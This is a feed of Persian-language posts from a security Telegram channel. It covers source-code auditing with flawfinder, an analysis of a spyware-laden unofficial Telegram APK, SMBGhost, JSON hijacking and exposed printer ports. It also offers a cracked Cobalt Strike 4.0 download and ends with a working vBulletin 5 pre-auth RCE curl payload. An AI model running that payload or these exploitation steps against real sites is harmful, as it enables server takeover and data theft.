Security Analysis – Telegram
Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
#IoT #Analyzer #C #SourceCodeAnalysis #Automation
یکی از نکات مهم در هنگام تست نفوذ و آنالیز، صرفه جویی در وقت هست.
یکی از ابزار‌های خوب و قدرتمند جهت کشف آسیب‌پذیری های مرتبط با BOF و Integer Overflow و ... ابزار flawfinder می‌باشد که با تحلیل کد این کار رو به سادگی برای ما انجام میده. اما با کمی دانش بش اسکریپتینگ میشه این فرآیند رو برای تمامی فایل‌های سی به صورت خودکار انجام داد.
این ابزار میتونه برای تحلیل کد های سی در نرم‌افزار‌ها و سورس Firmware های IoT خیلی کاربردی باشه. همچنین این ابزار پشتیبانی کامل از CWE رو داره.
اسکریپت:
find . -regex ".*\.c$" | while read c_file; do echo "\n############$c_file############";flawfinder $c_file | egrep -i "\(port\)|\(buffer\)|\(shell\)|\(integer\)|Hits = "; done

لینک گیتهاب:
https://github.com/david-a-wheeler/flawfinder
نصب:
https://github.com/david-a-wheeler/flawfinder/blob/master/INSTALL.md

@securation
تو یه گروهی بودم که یکی از دوستان از این تبلیغات‌های ناگهانی که تلگرام‌های غیررسمی میفرستن رو فرستاد با شعار دور زدن فیلترینگ. منم دیدم فرصت خوبیه تا یه نگاهی بندازم ببینم اپلیکیشن چیکار میکنه. عکسی که فرستادم رو مشاهده کنید.
سمت راست تلگرام رسمیه و سمت چپ تلگرام غیر رسمی که ایشون داشت.
چند تا چیز جالب داشت این برنامه که با هم ببینیم.
یکی اینکه تمامی فایل های تلگرام اصلی داخل تلگرام غیر رسمی هم وجود داشت یعنی طرف اومده فقط جاسوس افزارش رو اضافه کرده به فایل های تلگرام اصلی و تمام دسترسی هارو از برنامه اصلی گرفته و به پکیج خودش که تو ترمینال سمت راست یه نمونش که grep کردم تو diff مشخصه اضافه کرده. 😉
سمت چپ یه سری کد نوشته طرف که میاد چک میکنه ببینه اون برنامه ها رو گوشی نصبه یا نه!!! خیلی وقت نذاشتم ببینم چرا همچین کاری میکنه ولی مسلما دلیل خوبی نمیتونه داشته باشه :)
تو لیست سمت چپ سابلایم هم مشخصه همه چی که چه فایل هایی جدید اضافه شده.
این تلگرام غیر رسمی هم که فرستاده صرفا داره از سایفون استفاده میکنه برای دور زدن فیلترینگ 😂
@securation
Security Analysis
تو یه گروهی بودم که یکی از دوستان از این تبلیغات‌های ناگهانی که تلگرام‌های غیررسمی میفرستن رو فرستاد با شعار دور زدن فیلترینگ. منم دیدم فرصت خوبیه تا یه نگاهی بندازم ببینم اپلیکیشن چیکار میکنه. عکسی که فرستادم رو مشاهده کنید. سمت راست تلگرام رسمیه و سمت چپ…
لیست دستورات و کار‌های انجام شده:
دیکامپایل کردن APK:
- Jadx (jadx app.apk -o ~/Desktop/jadx-out)
مقایسه فایل Manifest با تلگرام اصلی:
- diff resources/AndroidManifest.xml ../jadx-out/resources/AndroidManifest.xml
پیدا کردن آیپی های موجود در برنامه:
- grep -HnroE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
پیدا کردن URL های موجود در برنامه:
- grep -riE "http://|https://|ahr0"
لیست کردن سورس های جدید اضافه شده به برنامه و بررسی دستی آنها.

@securation
#smb #smbghost #cve_2020_0796
از آسیب پذیری‌های جدیدی که سر و صدا به پا کرده آسیب‌پذیری SMBGhost با CVE-2020-0796 هست. در پروتکل SMB یک هدر با نام COMPRESSION_TRANSFORM_HEADER وجود داره که شامل 5 هدر فوق می‌باشد:
- ProtocolId
- OriginalCompressedSegmentSize
- CompressionAlgorithm
- Flags
- Offset/Length
آسیب‌پذیری مذکور از جایی شروع میشه که فانکشن srv2.sys از جمع دو مقدار OriginalCompressedSegmentSize و Offset/Length برای allocate کردن سایز بافر، بدون چک کردن معتبر بودن این آدرس استفاده میکنه.
برای توضیحات بیشتر پیشنهاد میکنم مطلب زیر رو از Mcafee بخونید
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796
همچنین اسکنر این آسیب‌پذیری برای اثبات وجود و عدم وجود در سیستم رو میتونید از لینک زیر دریافت کنید:
https://github.com/ollypwn/SMBGhost
@securation
#json #json_hijacking #hijacking #api
یکی دیگه از آسیب‌پذیری‌های کمتر شناخته شده، آسیب‌پذیری Json Hijacking می‌باشد. به موجب این آسیب‌پذیری نفوذگر می‌تواند مقادیر بازگشتی Json را بدون اینکه نیاز به وجود آسیب‌پذیری CORS باشد بخواند. این آسیب‌پذیری در صورتی رخ می‌دهد که امکان ارسال درخواست با متد GET وجود داشته باشد. البته اگر خروجی Json هم اطلاعات حساسی نباشد می‌توان این آسیب‌پذیری را نادیده گرفت زیرا اطلاعات ارزشمندی در اختیار ما قرار نخواهد داد.
به منظور اکسپلویت این آسیب‌پذیری کافیست یک صفحه HTML ساخته و API را در تگ noscript آدرس‌دهی کرد. سپس با استفاده از
Object.prototype.__defineSetter__("key of the sensitive value")
به مقدار آن دسترسی پیدا کرد. حال کافیست نفوذگر شخص قربانی را به صفحه‌ی نوشته شده توسط نفوذگر هدایت کند تا مقدار حیاتی را به سرقت ببرد.
برای اطلاعات بیشتر می‌توانید از لینک زیر کمک بگیرید:
https://haacked.com/archive/2009/06/25/json-hijacking.aspx
@securation
👍1
Forwarded from Security Analysis
cobaltstrike4.0-Fixed.zip
24.4 MB
#CobaltStrike #Cobalt_Strike #RedTeam
دوستانی که در حوزه‌ی Red Team فعالیت می‌کنن حتما با ابزار Cobalt Strike آشنایی دارن. این ابزار یک فریمورک قدرتمند برای Post-Exploitation هست که آخرین نسخه اون یعنی 4 رو به صورت کاملا کرک شده قرار داده‌ایم.
قطعا خیلی از سازمان ها از اخرین تکنولوژی ها مانند ngfw ها و بهترین edr ها استفاده کرده اند. اما سوال این است آیا برای امن سازی پورت ۹۱۰۰ کاری انجام داده اید؟
این پورت مربوط به پرینترهای Officejet pro شرکت HP است که در صورتی که در شبکه خود دارید یا علاقه مند به دانستن خطرات باز بودن این پورت هستید خواندن مقاله زیر خالی از لطف نیست! 😃

“HP Officejet pro Printers dork by Rapidsafeguard”

https://link.medium.com/Csu2KxbLm7
A new pre-auth 0day RCE exploit for vBulletin 5:

https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#web #expdev #rce #0day #darw1n @securation